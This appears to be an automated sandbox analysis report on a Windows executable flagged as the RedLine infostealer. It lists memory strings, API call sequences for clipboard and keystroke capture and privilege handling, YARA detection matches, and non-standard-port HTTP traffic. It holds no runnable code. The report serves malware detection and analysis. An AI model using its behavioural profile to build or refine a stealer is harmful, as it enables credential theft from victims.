Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007B425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_007B425A

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007B4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007B4458

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

0_2_007B425A

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007A0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_007A0219

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007CCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_007CCDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00743B4C
Source: b3u71vBG0u.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: b3u71vBG0u.exe, 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8e202bed-3
Source: b3u71vBG0u.exe, 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_37f25ef6-8
Source: b3u71vBG0u.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_618bcf89-c
Source: b3u71vBG0u.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d395f2ec-9

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007A4021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_007A4021

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00798858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00798858

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007A545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007A545F

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0074E800	0_2_0074E800
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076DBB5	0_2_0076DBB5
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0074E060	0_2_0074E060
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007C804A	0_2_007C804A
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00754140	0_2_00754140
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00762405	0_2_00762405
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00776522	0_2_00776522
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0077267E	0_2_0077267E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007C0665	0_2_007C0665
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00756843	0_2_00756843
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076283A	0_2_0076283A
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007789DF	0_2_007789DF
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00758A0E	0_2_00758A0E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007C0AE2	0_2_007C0AE2
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00776A94	0_2_00776A94
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A8B13	0_2_007A8B13
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0079EB07	0_2_0079EB07
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076CD61	0_2_0076CD61
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00777006	0_2_00777006
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0075710E	0_2_0075710E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00753190	0_2_00753190
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00741287	0_2_00741287
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007633C7	0_2_007633C7
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076F419	0_2_0076F419
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007616C4	0_2_007616C4
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00755680	0_2_00755680
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007678D3	0_2_007678D3
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007558C0	0_2_007558C0
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00761BB8	0_2_00761BB8
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00779D05	0_2_00779D05
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0074FE40	0_2_0074FE40
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076BFE6	0_2_0076BFE6
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00761FD0	0_2_00761FD0
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_02393620	0_2_02393620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_04F8E7B0	1_2_04F8E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_04F8DC90	1_2_04F8DC90

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: String function: 00768B40 appears 42 times
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: String function: 00747F41 appears 35 times
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: String function: 00760D27 appears 70 times

Source: b3u71vBG0u.exe, 00000000.00000003.1691811074.0000000004153000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs b3u71vBG0u.exe
Source: b3u71vBG0u.exe, 00000000.00000003.1691922124.00000000042FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs b3u71vBG0u.exe
Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs b3u71vBG0u.exe

Source: b3u71vBG0u.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/51@1/1

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007AA2D5 GetLastError,FormatMessageW,

0_2_007AA2D5

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00798713 AdjustTokenPrivileges,CloseHandle,		0_2_00798713
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00798CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00798CC3

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007AB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007AB59E

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007BF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_007BF121

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007AC602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_007AC602

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00744FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00744FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

File created: C:\Users\user\AppData\Local\Temp\aut13C0.tmp

Jump to behavior

Source: b3u71vBG0u.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp209C.tmp.1.dr, tmp20AC.tmp.1.dr, tmp20D0.tmp.1.dr, tmp20CF.tmp.1.dr, tmp20BD.tmp.1.dr, tmp20BE.tmp.1.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: b3u71vBG0u.exe	Virustotal: Detection: 63%
Source: b3u71vBG0u.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\b3u71vBG0u.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"	Jump to behavior

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Section loaded: wldp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: b3u71vBG0u.exe

Static file information: File size 1072128 > 1048576

Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: b3u71vBG0u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: b3u71vBG0u.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp

Source: b3u71vBG0u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: b3u71vBG0u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: b3u71vBG0u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: b3u71vBG0u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: b3u71vBG0u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007BC304 LoadLibraryA,GetProcAddress,

0_2_007BC304

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0074C590 push eax; retn 0074h	0_2_0074C599
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A8719 push FFFFFF8Bh; iretd	0_2_007A871B
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076E94F push edi; ret	0_2_0076E951
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076EA68 push esi; ret	0_2_0076EA6A
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00768B85 push ecx; ret	0_2_00768B98
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076EC43 push esi; ret	0_2_0076EC45
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076ED2C push edi; ret	0_2_0076ED2E

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7474
